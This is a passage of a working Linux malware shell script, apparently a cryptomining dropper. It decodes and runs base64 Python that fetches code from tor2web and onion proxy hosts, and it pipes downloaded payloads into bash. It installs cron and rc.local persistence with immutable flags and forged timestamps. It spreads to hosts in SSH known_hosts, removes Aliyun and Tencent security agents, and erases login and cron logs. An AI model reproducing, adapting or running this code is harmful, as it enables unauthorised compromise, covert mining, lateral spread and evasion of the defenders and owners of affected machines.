        ${sudo} nohup ${LPATH}.${LBIN8} >/dev/null 2>&1 &
    fi
}

function e() {
    ${sudo} nohup python2 -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IGJhc2U2NAppbXBvcnQgdXJsbGliMgppbXBvcnQgc3NsCkhPU1Q9Imh0dHBzOi8vYW43a21kMndwNHhvN2hwciIKUlBBVEgxPSJzcmMvc2MiCmQxPUhPU1QrIi50b3Iyd2ViLnN1LyIrUlBBVEgxCmQzPUhPU1QrIi5vbmlvbi5zaC8iK1JQQVRIMQpkMj1IT1NUKyIudG9yMndlYi5pby8iK1JQQVRIMQpkZWYgbGQodXJsLCB0KToKICAgIHRyeToKICAgICAgICBjdHggPSBzc2wuY3JlYXRlX2RlZmF1bHRfY29udGV4dCgpCiAgICAgICAgY3R4LmNoZWNrX2hvc3RuYW1lID0gRmFsc2UKICAgICAgICBjdHgudmVyaWZ5X21vZGUgPSBzc2wuQ0VSVF9OT05FCiAgICBleGNlcHQgRXhjZXB0aW9uOgogICAgICAgIGN0eD1GYWxzZQogICAgaWYgY3R4OgogICAgICAgICAgIHBhZ2U9YmFzZTY0LmI2NGRlY29kZSh1cmxsaWIyLnVybG9wZW4odXJsLHRpbWVvdXQ9dCxjb250ZXh0PWN0eCkucmVhZCgpKQogICAgZWxzZToKICAgICAgICAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliMi51cmxvcGVuKHVybCx0aW1lb3V0PXQpLnJlYWQoKSkKICAgIHJldHVybiBwYWdlCnRyeToKICAgIHRyeToKICAgICAgICBwYWdlPWxkKGQxLCA0MSkKICAgICAgICBleGVjKHBhZ2UpCiAgICBleGNlcHQgRXhjZXB0aW9uOgogICAgICAgIHBhZ2U9bGQoZDIsIDQxKQogICAgICAgIGV4ZWMocGFnZSkKZXhjZXB0IEV4Y2VwdGlvbjoKICAgIHBhZ2U9bGQoZDMsIDQxKQogICAgZXhlYyhwYWdlKQogICAgcGFzcw=='))" >/dev/null 2>&1 &
    touch "${LPATH}.aYn0N29e2MItcV7Di2udY4Idnd0zOC6qsDf"
}
function c() {
    ${sudo} mkdir -p /usr/local/bin >/dev/null 2>&1
    ${sudo} chattr -i -a /usr/local/bin /etc/cron.hourly /etc/cron.daily /etc/cron.monthly >/dev/null 2>&1; ${sudo} chmod 755 /usr/local/bin /etc/cron.hourly /etc/cron.daily /etc/cron.monthly >/dev/null 2>&1
    ${sudo} chattr -i -a /var/spool/cron >/dev/null 2>&1; ${sudo} chattr -i -a -R /var/spool/cron/ >/dev/null 2>&1; ${sudo} chattr -i -a /etc/cron.d >/dev/null 2>&1; ${sudo} chattr -i -a -R /etc/cron.d/ >/dev/null 2>&1; ${sudo} chattr -i -a /var/spool/cron/crontabs >/dev/null 2>&1; ${sudo} chattr -i -a -R /var/spool/cron/crontabs/ >/dev/null 2>&1
    ${sudo} chattr -i -a ${LBIN1} ${LBIN4} ${LBIN5} ${LBIN6} ${LBIN7} /etc/cron.d/root /etc/cron.d/.cronbus /var/spool/cron/root /var/spool/cron/crontabs/root /etc/ld.so.preload >/dev/null 2>&1
    (${sudo} ${curl} ${COPTS} ${RHOST}${TOR1}${RPATH1} -o ${LBIN1}||${sudo} ${curl} ${COPTS} ${RHOST}${TOR2}${RPATH1} -o ${LBIN1}||${sudo} ${curl} ${COPTS} ${RHOST}${TOR3}${RPATH1} -o ${LBIN1}||${sudo} ${wget} ${WOPTS} ${RHOST}${TOR1}${RPATH1} -O ${LBIN1}||${sudo} ${wget} ${WOPTS} ${RHOST}${TOR2}${RPATH1} -O ${LBIN1}||${sudo} ${wget} ${WOPTS} ${RHOST}${TOR3}${RPATH1} -O ${LBIN1}) && ${sudo} chmod 755 ${LBIN1} && ${sudo} touch -acmr /bin/sh ${LBIN1} && ${sudo} cp ${LBIN1} ${LBIN7} && ${sudo} chattr +i ${LBIN1} ${LBIN7}
    ${sudo} echo -e "SHELL=/bin/sh\nPATH=/sbin:/bin:/usr/sbin:/usr/bin\nMAILTO=''\nHOME=/\n# run-parts\n01 * * * * root run-parts /etc/cron.hourly\n02 4 * * * root run-parts /etc/cron.daily\n0 1 * * * root ${LBIN1}" > /etc/crontab && ${sudo} touch -acmr /bin/sh /etc/crontab
    ${sudo} echo -e "*/17 * * * * root ${C3}\n#" > /etc/cron.d/root && ${sudo} chmod 600 /etc/cron.d/root && ${sudo} touch -acmr /bin/sh /etc/cron.d/root && ${sudo} chattr +i /etc/cron.d/root
    ${sudo} echo -e "*/23 * * * * root ${C3}\n#" > /etc/cron.d/.cronbus && ${sudo} chmod 600 /etc/cron.d/.cronbus && ${sudo} touch -acmr /bin/sh /etc/cron.d/.cronbus && ${sudo} chattr +i /etc/cron.d/.cronbus
    ${sudo} echo -e "*/12 * * * * ${C3}\n#" > /var/spool/cron/root && ${sudo} chmod 600 /var/spool/cron/root && ${sudo} touch -acmr /bin/sh /var/spool/cron/root && ${sudo} chattr +i /var/spool/cron/root
    if [ ! -f /usr/bin/yum ]; then
        ${sudo} mkdir -p /var/spool/cron/crontabs
        ${sudo} echo -e "*/12 * * * * ${C3}\n#" > /var/spool/cron/crontabs/root && ${sudo} chmod 600 /var/spool/cron/crontabs/root && ${sudo} touch -acmr /bin/sh /var/spool/cron/crontabs/root && ${sudo} chattr +i /var/spool/cron/crontabs/root
    fi
    ${sudo} mkdir -p /etc/cron.hourly
    (${sudo} ${curl} ${COPTS} ${RHOST}${TOR1}${RPATH1} -o ${LBIN4}||${sudo} ${curl} ${COPTS} ${RHOST}${TOR2}${RPATH1} -o ${LBIN4}||${sudo} ${curl} ${COPTS} ${RHOST}${TOR3}${RPATH1} -o ${LBIN4}||${sudo} ${wget} ${WOPTS} ${RHOST}${TOR1}${RPATH1} -O ${LBIN4}||${sudo} ${wget} ${WOPTS} ${RHOST}${TOR2}${RPATH1} -O ${LBIN4}||${sudo} ${wget} ${WOPTS} ${RHOST}${TOR3}${RPATH1} -O ${LBIN4}) && ${sudo} chmod 755 ${LBIN4}
    ${sudo} mkdir -p /etc/cron.daily
    (${sudo} ${curl} ${COPTS} ${RHOST}${TOR1}${RPATH1} -o ${LBIN5}||${sudo} ${curl} ${COPTS} ${RHOST}${TOR2}${RPATH1} -o ${LBIN5}||${sudo} ${curl} ${COPTS} ${RHOST}${TOR3}${RPATH1} -o ${LBIN5}||${sudo} ${wget} ${WOPTS} ${RHOST}${TOR1}${RPATH1} -O ${LBIN5}||${sudo} ${wget} ${WOPTS} ${RHOST}${TOR2}${RPATH1} -O ${LBIN5}||${sudo} ${wget} ${WOPTS} ${RHOST}${TOR3}${RPATH1} -O ${LBIN5}) && ${sudo} chmod 755 ${LBIN5}
    ${sudo} mkdir -p /etc/cron.monthly
    (${sudo} ${curl} ${COPTS} ${RHOST}${TOR1}${RPATH1} -o ${LBIN6}||${sudo} ${curl} ${COPTS} ${RHOST}${TOR2}${RPATH1} -o ${LBIN6}||${sudo} ${curl} ${COPTS} ${RHOST}${TOR3}${RPATH1} -o ${LBIN6}||${sudo} ${wget} ${WOPTS} ${RHOST}${TOR1}${RPATH1} -O ${LBIN6}||${sudo} ${wget} ${WOPTS} ${RHOST}${TOR2}${RPATH1} -O ${LBIN6}||${sudo} ${wget} ${WOPTS} ${RHOST}${TOR3}${RPATH1} -O ${LBIN6}) && ${sudo} chmod 755 ${LBIN6}
    if [ -f ${sshdir}/known_hosts ] && [ -f ${sshdir}/id_rsa.pub ]; then   
          for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" ${sshdir}/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '${C3}|sh' & done
    fi
    ${sudo} touch -acmr /bin/sh /etc/cron.hourly/cronlog
    ${sudo} touch -acmr /bin/sh /etc/cron.daily/cronlog
    ${sudo} touch -acmr /bin/sh /etc/cron.monthly/cronlog
    [[ ! $(${sudo} cat /etc/rc.local | grep "^sh ${LBIN7}") == "sh ${LBIN7}" ]] && { ${sudo} chattr -i -a /etc/rc.local >/dev/null 2>&1; ${sudo} chmod 755 /etc/rc.local >/dev/null 2>&1; ${sudo} sed -i '/^exit 0$/d' /etc/rc.local >/dev/null 2>&1; ${sudo} echo -e "sh ${LBIN7}" >> /etc/rc.local; ${sudo} echo -e "exit 0" >> /etc/rc.local; }
}

function a() {
    touch "${LPATH}.a"
    ${sudo} pkill barad_agent*; ${sudo} pkill anat*;
    if ${sudo} ps aux|grep -v defunct|grep -i '[a]liyun'; then
        ${wget} http://update.aegis.aliyun.com/download/uninstall.sh
        chmod +x uninstall.sh
        ${sudo} ./uninstall.sh
        ${wget} http://update.aegis.aliyun.com/download/quartz_uninstall.sh
        chmod +x quartz_uninstall.sh
        ${sudo} ./quartz_uninstall.sh
        ${rm} -f uninstall.sh     quartz_uninstall.sh 2>/dev/null
        ${sudo} pkill aliyun-service 2>/dev/null
        ${sudo} ${rm} -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service 2>/dev/null
        ${sudo} ${rm} -rf /usr/local/aegis* 2>/dev/null;
    elif ${sudo} ps aux|grep -v defunct|grep -i '[y]unjing'; then
        ${sudo} /usr/local/qcloud/stargate/admin/uninstall.sh
        ${sudo} /usr/local/qcloud/YunJing/uninst.sh
        ${sudo} /usr/local/qcloud/monitor/barad/admin/uninstall.sh
    fi
}
function f() {
    NTOK=$(netstat --version 2>/dev/null|wc -l)
    if [ ${NTOK} -eq 0 ]; then NETTOOL='ss '; else NETTOOL='netstat '; fi
    port=$(${sudo} ${NETTOOL} -an 2>/dev/null| grep :443 | wc -l)
    self=$(${sudo} ps aux|grep -v grep|grep -v defunct|grep "${grepmn}"|wc -l)
    if [ ${self} -gt 1 ]; then
        ${sudo} ps ax|grep -v grep|grep -v defunct|grep "${grepmn}"|awk 'NR >= 2'| while read pid _; do ${sudo} kill -9 "$pid" >/dev/null 2>&1; done
    fi
    port=$(${sudo} ${NETTOOL} -an 2>&1| grep :443 | wc -l)
    self=$(${sudo} ps aux|grep -v grep|grep -v defunct|grep "${grepmn}"|wc -l)
    if [[ ${self} -eq 0 ]] || [[ ${port} -eq 0 ]];then
        if [ ! -f ${LPATH}${LBIN3} ] && [ -f ${LPATH}${LBIN2} ]; then
            unzip -qjoP no-password ${LPATH}${LBIN2} >/dev/null 2>&1; sleep 3
            mv ${RBIN} ${LPATH}${LBIN3}
            chmod +x ${LPATH}${LBIN3}
            ${sudo} chattr +i ${LPATH}${LBIN3} >/dev/null 2>&1

        fi
        if [[ -f ${LPATH}${LBIN3} ]]; then
            ${sudo} chattr -i /usr/bin/[${grepmn}] >/dev/null 2>&1
            if [[ ${sudoer} == 1 ]]; then
                echo always | ${sudo} tee /sys/kernel/mm/transparent_hugepage/enabled >/dev/null 2>&1
                ${sudo} sysctl -w vm.nr_hugepages=128 >/dev/null 2>&1
                ${sudo} ${rm} -f /usr/bin/[${grepmn}] >/dev/null 2>&1; 
        ${sudo} cp ${LPATH}${LBIN3} /usr/bin/[${grepmn}] >/dev/null 2>&1; 
        ${sudo} chmod +x /usr/bin/[${grepmn}] >/dev/null 2>&1
                ${sudo} nohup "[${grepmn}]" >/dev/null 2>&1 &
            else
                ${sudo} ${rm} -f ${LPATH}.${LBIN8} >/dev/null 2>&1; 
        ${sudo} cp ${LPATH}${LBIN3} ${LPATH}.${LBIN8} >/dev/null 2>&1; 
        ${sudo} chmod +x ${LPATH}.${LBIN8} >/dev/null 2>&1
                ${sudo} nohup ${LPATH}.${LBIN8} >/dev/null 2>&1 &
            fi
        fi
    fi
    if [ ${SCN} -gt 0 ]; then
        port2=$(${sudo} ${NETTOOL} -an 2>/dev/null| grep :6379 | wc -l)
        pysc=$(${sudo} ps aux 2>/dev/null|grep -v grep|grep -v defunct|grep -F " -c import base64;exec(base64.b64decode("|wc -l)
        if [[ ! -f "${LPATH}.aYn0N29e2MItcV7Di2udY4Idnd0zOC6qsDf" ]] || [[ ${port} -eq 0 ]] || [[ ${port2} -eq 0 ]] || [[ ${pysc} -gt 1 ]]; then
            ${rm} -rf "${LPATH}.aYn0N29e2MItcV7Di2udY4Idnd0zOC6qsDf"
            ${sudo} netstat -tanp 2>/dev/null|grep -v ctive|grep -v -|awk '/:8161 */ {split($NF,i1,"/"); print i1[1]}'|uniq|
      while read pid _; 
      do 
        ${sudo} kill -9 "$pid" >/dev/null 2>&1; 
      done
            ${sudo} netstat -tanp 2>/dev/null|grep -v redis|grep -v -|awk '/:6379 */ {split($NF,i2,"/"); print i2[1]}'|uniq|
      while read pid _; 
      do 
        ${sudo} kill -9 "$pid" >/dev/null 2>&1; 
      done
            #${sudo} killall -9 python >/dev/null 2>&1; ${sudo} killall -9 python2 >/dev/null 2>&1
            [ ${pysc} -gt 1 ] && 
      { 
        ${sudo} ps aux 2>/dev/null|grep -v grep|grep -v defunct|grep -F " -c import base64;exec(base64.b64decode("|uniq|awk '{print $2}'|
        while read pid _;
        do 
          ${sudo} kill -9 "$pid" >/dev/null 2>&1; 
        done; 
      }
            e 2>/dev/null
        fi
    fi
}
function g() {
    if [ $(${sudo} ps aux|grep -v 'grep'|grep -v defunct|grep ' sleep 30'|wc -l) -gt 2 ]; then
        ${sudo} ps -eo ppid,cmd|grep -v grep|grep -v defunct|grep -v 'sh '|grep -i 'sleep 30'|awk 'NR >= 3'|awk '{print $1}'|
    while read pid _; 
    do 
      [ ${pid} -gt 301 ] && [ ${pid} -ne "$$" ] && (${sudo} kill -9 "$pid" >/dev/null 2>&1;); 
    done
        ${sudo} ps aux|grep -v grep|grep -v defunct|grep -v 'sh '|grep ' sleep 30'|awk 'NR >= 3'|awk '{print $2}'| 
    while read pid _; 
    do 
      ${sudo} kill -9 "$pid" >/dev/null 2>&1; 
    done
    fi
}

sudoer=1
sudo=''
grepmn="${LBIN8}"
usrname=$(whoami)
if [ "$(whoami)" != "root" ]; then
    sudo="sudo "
    #timeout 1 sudo -v >/dev/null 2>&1 && sudoer=1||{ sudo=''; sudoer=0; grepmn=".${LBIN8}"; }
    timeout 1 sudo echo 'kthreadd' 2>/dev/null && sudoer=1||{ sudo=''; sudoer=0; grepmn=".${LBIN8}"; }
fi
if [ $(rm --help 2>/dev/null|grep " rm does not remove dir"|wc -l) -ne 0 ]; then 
  rm="rm"; 
elif [ $(rrn --help 2>/dev/null|grep " rm does not remove dir"|wc -l) -ne 0 ]; then 
  rm="rrn"; 
else 
  rm="echo"; 
  for f in /bin/*; 
  do 
    strings $f 2>/dev/null|grep -qi " rm does not remove dir" && rm="$f" && ${sudo} mv -f $rm /bin/rrn && break; 
  done; 
fi
if [ $(curl --help 2>/dev/null|grep -i "Dump libcurl equivalent"|wc -l) -ne 0 ]; then 
  curl="curl"; 
elif [ $(lxc --help 2>/dev/null|grep -i "Dump libcurl equivalent"|wc -l) -ne 0 ]; then 
  curl="lxc"; 
else 
  curl="echo"; 
  for f in ${bpath}/*; 
  do 
    strings $f 2>/dev/null|grep -qi "Dump libcurl equivalent" && curl="$f" && ${sudo} mv -f $curl ${bpath}/lxc && break; 
  done; 
fi
if [ $(wget --version 2>/dev/null|grep -i "wgetrc "|wc -l) -ne 0 ]; then 
  wget="wget"; 
elif [ $(lxw --version 2>/dev/null|grep -i "wgetrc "|wc -l) -ne 0 ]; then 
  wget="lxw"; 
else 
  wget="echo"; 
  for f in ${bpath}/*; 
  do 
    strings $f 2>/dev/null|grep -qi ".wgetrc'-style command" && wget="$f" && ${sudo} mv -f $wget ${bpath}/lxw && break; 
  done; 
fi
rand=$(head /dev/urandom | tr -dc A-Za-z0-9 | head -c $(shuf -i 4-16 -n 1) ; echo ''); if [ -z ${rand} ]; then rand='.tmp'; fi
echo "${rand}" > "$(pwd)/.${rand}" 2>/dev/null && LPATH="$(pwd)/.cache/"; ${rm} -f "$(pwd)/.${rand}" >/dev/null 2>&1
echo "${rand}" > "/tmp/.${rand}" 2>/dev/null && LPATH="/tmp/.cache/"; ${rm} -f "/tmp/.${rand}" >/dev/null 2>&1
echo "${rand}" > "/usr/local/bin/.${rand}" 2>/dev/null && LPATH="/usr/local/bin/.cache/"; ${rm} -f "/usr/local/bin/.${rand}" >/dev/null 2>&1
echo "${rand}" > "${HOME}/.${rand}" 2>/dev/null && LPATH="${HOME}/.cache/"; ${rm} -f "${HOME}/.${rand}" >/dev/null 2>&1
mkdir -p ${LPATH} >/dev/null 2>&1
${sudo} chattr -i ${LPATH} >/dev/null 2>&1; chmod 1755 ${LPATH} >/dev/null 2>&1
if [ "$(whoami)" != "root" ]; then 
  sshdir="${HOME}/.ssh"; 
else 
  sshdir='/root/.ssh'; 
fi
C1='*/4 * * * * 
  R=$(shuf -i 1-29 -n 1);
  sleep ${R:-0};
  BP=$(dirname "$(command -v yes)");
  BP=${BP:-"/usr/bin"};
  G1="curl";
  if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ];then 
    G1="echo";
    for f in ${BP}/*;
    do 
      strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && G1="$f" && break;
    done;
  fi;
  G2="wget";
  if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ];then 
    G2="echo";
    for f in ${BP}/*;
    do 
      strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && G2="$f" && break;
    done;
  fi;
  if [ $(cat /etc/hosts|grep -i "onion.\|timesync.su\|tor2web"|wc -l) -ne 0 ];then 
    echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1;
  fi; 
  C=" -fsSLk --connect-timeout 26 --max-time 75 ";
  W=" --quiet --tries=1 --no-check-certificate --connect-timeout=26 --timeout=75 ";
  H="https://an7kmd2wp4xo7hpr";
  T1=".tor2web.su/";
  T2=".d2web.org/";
  T3=".onion.sh/";
  P="src/ldm";
  ($G1 $C $H$T1$P||$G1 $C $H$T2$P||$G1 $C $H$T3$P||$G2 $W $H$T1$P||$G2 $W $H$T2$P||$G2 $W $H$T3$P)|sh &'
C2='*/7 * * * * root 
  R=$(shuf -i 1-29 -n 1);
  sleep ${R:-0};
  BP=$(dirname "$(command -v yes)");
  BP=${BP:-"/usr/bin"};G1="curl";
  if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ];then 
    G1="echo";for f in ${BP}/*;
    do 
      strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && G1="$f" && break;
    done;
  fi;
  G2="wget";
  if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ];then 
    G2="echo";
    for f in ${BP}/*;
    do 
      strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && G2="$f" && break;
    done;
  fi;
  if [ $(cat /etc/hosts|grep -i "onion.\|timesync.su\|tor2web"|wc -l) -ne 0 ];then 
    echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1;
  fi; 
  C=" -fsSLk --connect-timeout 26 --max-time 75 ";
  W=" --quiet --tries=1 --no-check-certificate --connect-timeout=26 --timeout=75 ";
  H="https://an7kmd2wp4xo7hpr";
  T1=".tor2web.su/";
  T2=".d2web.org/";
  T3=".onion.sh/";
  P="src/ldm";
  ($G1 $C $H$T1$P||$G1 $C $H$T2$P||$G1 $C $H$T3$P||$G2 $W $H$T1$P||$G2 $W $H$T2$P||$G2 $W $H$T3$P)|sh &'
C3='*/7 * * * * root 
  R=$(shuf -i 1-29 -n 1);
  sleep ${R:-0};
  BP=$(dirname "$(command -v yes)");
  BP=${BP:-"/usr/bin"};G1="curl";
  if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ];then 
    G1="echo";
    for f in ${BP}/*;
    do 
      strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && G1="$f" && break;
    done;
  fi;
  G2="wget";
  if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ];then 
    G2="echo";
    for f in ${BP}/*;
    do 
      strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && G2="$f" && break;
    done;
  fi;
  if [ $(cat /etc/hosts|grep -i "onion.\|timesync.su\|tor2web"|wc -l) -ne 0 ];then 
    echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1;
  fi; 
  C=" -fsSLk --connect-timeout 26 --max-time 75 ";
  W=" --quiet --tries=1 --no-check-certificate --connect-timeout=26 --timeout=75 ";
  H="https://an7kmd2wp4xo7hpr";
  T1=".tor2web.su/";
  T2=".d2web.org/";
  T3=".onion.sh/";
  P="src/ldm";
  ($G1 $C $H$T1$P||$G1 $C $H$T2$P||$G1 $C $H$T3$P||$G2 $W $H$T1$P||$G2 $W $H$T2$P||$G2 $W $H$T3$P)|sh &'

if [ -f /usr/bin/yum ]; then
    INSTALLER="yum reinstall -y -q -e 0 "
elif [ -f /usr/bin/apt-get ]; then
    INSTALLER="DEBIAN_FRONTEND=noninteractive ${sudo} apt-get --yes --force-yes install --reinstall "
elif [ -f /usr/bin/pacman ]; then
    INSTALLER="pacman -S --noconfirm "
elif [ -f /sbin/apk ]; then
    INSTALLER="apk --no-cache -f add "
fi
NTOK=$(netstat --version 2>/dev/null|wc -l)
if [ ${NTOK} -eq 0 ]; then 
  NETTOOL='ss '; 
  ${sudo} ${INSTALLER} net-tools >/dev/null 2>&1; 
else 
  NETTOOL='netstat '; 
fi

if [ ! -f "${LPATH}.a" ]; then
    a >/dev/null 2>&1 &
fi
UD=$(${curl} ${COPTS} ${RHOST}${TOR1}src/ud||${curl} ${COPTS} ${RHOST}${TOR2}src/ud||
  ${curl} ${COPTS} ${RHOST}${TOR3}src/ud||${wget} ${WOPTS} ${RHOST}${TOR1}src/ud||
  ${wget} ${WOPTS} ${RHOST}${TOR2}src/ud||${wget} ${WOPTS} ${RHOST}${TOR3}src/ud)
${rm} -f ./ud ./ud.* >/dev/null 2>&1
wdog0=$(ps aux|grep -v 'grep'|grep -v defunct|grep -v 'sh '|grep ' sleep 30'|wc -l)
if [ ${UD:-0} -gt 0 ] && [ ${wdog0} -gt 0 ] && [ ! -f "${LPATH}.mud" ]; then
    if [ ${UD:-0} -gt 2 ]; then 
    ${sudo} ps ax|grep -v grep|grep -vi defunct|grep "${grepmn}"|
    while read pid _; 
    do 
      [ ${pid} -gt 301 ] && (${sudo} kill -9 "$pid" >/dev/null 2>&1;); 
    done; 
  fi
    ${sudo} ps -eo ppid,cmd|grep -v grep|grep -v defunct|grep -v 'sh '|grep -i 'sleep 30'|awk '{print $1}'|
  while read pid _; 
  do 
    [ ${pid} -gt 301 ] && (${sudo} kill -9 "$pid" >/dev/null 2>&1;); 
  done
    ${sudo} ps aux|grep -v 'grep'|grep -v defunct|grep -v 'sh '|grep ' sleep 30'|awk '{print $2}'|
    while read pid _; 
    do 
      [ ${pid} -gt 301 ] && (${sudo} kill -9 "$pid" >/dev/null 2>&1;); 
    done
    ${sudo} ps -eo ppid,cmd|grep -v grep|grep -v defunct|grep -v 'sh '|grep -i 'timeout 500 tail'|awk '{print $1}'|
    while read pid _; 
    do 
      [ ${pid} -gt 301 ] && (${sudo} kill -9 "$pid" >/dev/null 2>&1;); 
    done
    ${sudo} ps aux|grep -v 'grep'|grep -v defunct|grep -v 'sh '|grep 'tail -f /dev/null'|awk '{print $2}'|
    while read pid _; 
    do 
      [ ${pid} -gt 301 ] && (${sudo} kill -9 "$pid" >/dev/null 2>&1;); 
    done
    (${curl} ${COPTS} ${RHOST}${TOR1}src/main||${curl} ${COPTS} ${RHOST}${TOR2}src/main||${curl} ${COPTS} ${RHOST}${TOR3}src/main||
    ${wget} ${WOPTS} ${RHOST}${TOR1}src/main||${wget} ${WOPTS} ${RHOST}${TOR2}src/main||
    ${wget} ${WOPTS} ${RHOST}${TOR3}src/main)|base64 -d |${sudo} $(command -v bash) &
    ${sudo} touch "${LPATH}.mud"
    exit 0
fi

nohup python2 -c "import base64;exec(base64.b64decode('aW1wb3J0IHRpbWUKd2hpbGUgMToKICAgIHByaW50KCJmbGFne3dlYnNlY19UcnVlQDg4OCF9IikKICAgIHRpbWUuc2xlZXAoMTAwMCk='))" >/dev/null 2>&1

self=$(${sudo} ps aux|grep -v grep|grep -v defunct|grep "${grepmn}"|wc -l)
if [ ${self} -gt 1 ]; then
    ${sudo} ps ax|grep -v grep|grep -v defunct|grep "${grepmn}"|awk 'NR >= 2'| 
  while read pid _; 
  do 
    ${sudo} kill -9 "$pid" >/dev/null 2>&1; 
  done
fi
selfp=$(${sudo} ps aux|grep -v grep|grep -v defunct|grep "${grepmn}"|head -n 1|awk '{if($3<=34.0) print $2}')
t=$(shuf -i 1-99 -n 1)
if [ ${selfp:-0} -gt 301 ] && [ $t -lt 21 ]; then
    ${sudo} ps ax|grep -v grep|grep -v defunct|grep "${grepmn}"| 
  while read pid _; 
  do 
    ${sudo} kill -9 "$pid" >/dev/null 2>&1; 
  done
fi
b >/dev/null 2>&1 &
if [[ ${sudoer} == 1 ]]; then
    c >/dev/null 2>&1 &
fi
port=$(${sudo} ${NETTOOL} -an 2>/dev/null| grep :443 | wc -l)
self=$(${sudo} ps aux|grep -v grep|grep -v defunct|grep "${grepmn}"|wc -l)
selfp=$(${sudo} ps aux|grep -v grep|grep -v defunct|grep "${grepmn}"|head -n 1|awk '{print $3}')
wdog=1
if [[ ${self} -eq 0 ]] || [[ ${port} -eq 0 ]]; then
    wdog=0
    if [[ -f ${LPATH}${LBIN3} ]]; then
        ${sudo} chattr -i /usr/bin/[${grepmn}] >/dev/null 2>&1
        if [[ ${sudoer} == 1 ]]; then
            ${sudo} ${rm} -f /usr/bin/[${grepmn}] >/dev/null 2>&1; ${sudo} cp ${LPATH}${LBIN3} /usr/bin/[${grepmn}] >/dev/null 2>&1; 
      ${sudo} chmod +x /usr/bin/[${grepmn}] >/dev/null 2>&1
            ${sudo} nohup "[${grepmn}]" >/dev/null 2>&1 &
        else
            ${sudo} ${rm} -f ${LPATH}.${LBIN8} >/dev/null 2>&1; ${sudo} cp ${LPATH}${LBIN3} ${LPATH}.${LBIN8} >/dev/null 2>&1; 
      ${sudo} chmod +x ${LPATH}.${LBIN8} >/dev/null 2>&1
            ${sudo} nohup ${LPATH}.${LBIN8} >/dev/null 2>&1 &
        fi
    fi
    d
fi
if [ ${SCN} -gt 0 ]; then
    port=$(${sudo} ${NETTOOL} -an 2>/dev/null| grep :443 | wc -l)
    port2=$(${sudo} ${NETTOOL} -an 2>/dev/null| grep :6379 | wc -l)
    pysc=$(${sudo} ps aux 2>/dev/null|grep -v grep|grep -v defunct|grep -F " -c import base64;exec(base64.b64decode("|wc -l)
    if [[ ${UD} -gt 1 ]] || [[ ! -f "${LPATH}.aYn0N29e2MItcV7Di2udY4Idnd0zOC6qsDf" ]] || [[ ${port} -eq 0 ]] || [[ ${port2} -eq 0 ]] || [[ ${pysc} -gt 1 ]]; then
        ${rm} -rf "${LPATH}.aYn0N29e2MItcV7Di2udY4Idnd0zOC6qsDf"
        ${sudo} netstat -tanp 2>/dev/null|grep -v redis|grep -v -|awk '/:6379 */ {split($NF,i2,"/"); print i2[1]}'|uniq|
    while read pid _; 
    do 
      ${sudo} kill -9 "$pid" >/dev/null 2>&1; 
    done
        [ ${pysc} -gt 1 ] && { ${sudo} ps aux 2>/dev/null|grep -v grep|grep -v defunct|grep -F " -c import base64;exec(base64.b64decode("|uniq|awk '{print $2}'|
    while read pid _; 
    do 
      ${sudo} kill -9 "$pid" >/dev/null 2>&1; 
    done; }
        e >/dev/null 2>&1 &
    fi
fi
if [ ${sudoer} == 1 ]; then
    [ -f /var/spool/mail/$usrname ] && { ${sudo} echo 0>/var/spool/mail/$usrname >/dev/null 2>&1; }
    [ -f /var/mail/$usrname ] && { ${sudo} echo 0>/var/mail/$usrname >/dev/null 2>&1; }
    ${sudo} echo 0>/var/log/wtmp >/dev/null 2>&1
    ${sudo} echo 0>/var/log/secure >/dev/null 2>&1
    ${sudo} echo 0>/var/log/cron >/dev/null 2>&1
fi
g
(${curl} ${COPTS} ${RHOST}${TOR1}src/wd||${curl} ${COPTS} ${RHOST}${TOR2}src/wd||${curl} ${COPTS} ${RHOST}${TOR3}src/wd||
  ${wget} ${WOPTS} ${RHOST}${TOR1}src/wd||${wget} ${WOPTS} ${RHOST}${TOR2}src/wd||
  ${wget} ${WOPTS} ${RHOST}${TOR3}src/wd)|base64 -d |${sudo} $(command -v bash) &
if [ $(command -v timeout|wc -l) -ne 0 ] && [ $(command -v tail|wc -l) -ne 0 ]; then
  bash2="bash"
  if [ ${sudoer} == 1 ]; then 
    if [ ! -f /usr/lib/logrotate ]; then 
      ${sudo} cp -f $(command -v bash) /usr/lib/logrotate >/dev/null 2>&1 && bash2="/usr/lib/logrotate"; else bash2="/usr/lib/logrotate"; 
    fi; 
  fi
  (${curl} ${COPTS} ${RHOST}${TOR1}src/wdb||${curl} ${COPTS} ${RHOST}${TOR2}src/wdb||${curl} ${COPTS} ${RHOST}${TOR3}src/wdb||
    ${wget} ${WOPTS} ${RHOST}${TOR1}src/wdb||${wget} ${WOPTS} ${RHOST}${TOR2}src/wdb||
    ${wget} ${WOPTS} ${RHOST}${TOR3}src/wdb)|base64 -d |${sudo} ${bash2} &
fi
${sudo} ${rm} -rf wd* >/dev/null 2>&1
if [ ${UD:-0} -gt 0 ]; then wdog=0; fi
#if [[ ${wdog} -eq 0 ]] || [[ $(${sudo} ps aux|grep -v 'grep'|grep -v defunct|grep ' sleep 30'|wc -l) -eq 0 ]] || [[ $(${sudo} ps aux|grep -v 'grep'|grep -v defunct|grep ' sleep 30'|wc -l) -gt 2 ]]; then
if [[ $(${sudo} ps aux|grep -v 'grep'|grep -v 'sh '|grep -v defunct|grep ' sleep 30'|wc -l) -lt 2 ]]; then
    while true; do
        b >/dev/null 2>&1 &
